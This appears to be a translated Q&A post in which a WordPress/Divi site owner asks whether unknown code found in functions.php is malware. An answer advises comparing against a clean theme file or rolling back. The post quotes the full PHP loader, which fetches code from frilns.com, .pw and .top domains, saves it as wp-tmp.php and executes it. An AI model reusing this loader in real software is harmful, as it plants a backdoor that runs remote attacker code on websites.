1

我正在开发一个带有 Wordpress 和 Divi 主题的新网站。

今天我在function.php中发现了一个未知代码。当我尝试访问 URL 时,什么也没有发生。

在网站上:https ://themecheck.info/他们说这是一个恶意软件。但我无法确认(https://themecheck.info/fr/score/theme-wordpress-solar-shared-by-vestathemes-com.html

在另一篇文章中,他们说 Frilins 是一种 Chrome 恶意软件。wordpress 什么都没有。

我怕它被黑了。

$wp_auth_key='3770030e7d87cbaf0baf1';
    if (($tmpcontent = @file_get_contents("http://www.frilns.com/code.php") OR $tmpcontent = 
@file_get_contents_tcurl("http://www.frilns.com/code.php")) AND stripos($tmpcontent, 
$wp_auth_key) !== false) {

        if (stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
            @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

            if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                    @file_put_contents('wp-tmp.php', $tmpcontent);
                }
            }

        }
    }


    elseif ($tmpcontent = @file_get_contents("http://www.frilns.pw/code.php")  AND 
stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
            @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

            if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                    @file_put_contents('wp-tmp.php', $tmpcontent);
                }
            }

        }
    } 

            elseif ($tmpcontent = @file_get_contents("http://www.frilns.top/code.php")  AND 
stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
            @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

            if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                    @file_put_contents('wp-tmp.php', $tmpcontent);
                }
            }

        }
    }
    elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND 
stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent));

    } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND 
stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent)); 

    } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, 
$wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent)); 

    }    
}
}

我试过这样但没有真正的信息。

谢谢您的帮助

Ĵ

4

1 回答 1

1

您可以将新安装的 Divi 中的默认 functions.php 文件(取自成员区域,即 100% 安全)与您的实际 functions.php 文件进行比较,并查看您当前拥有的代码默认情况下不存在,它应该不。

您可以转到主题选项 -> 更新并回滚到以前的版本,然后再次升级,这将获取干净的新主题文件。

于 2020-05-03T22:06:56.920 回答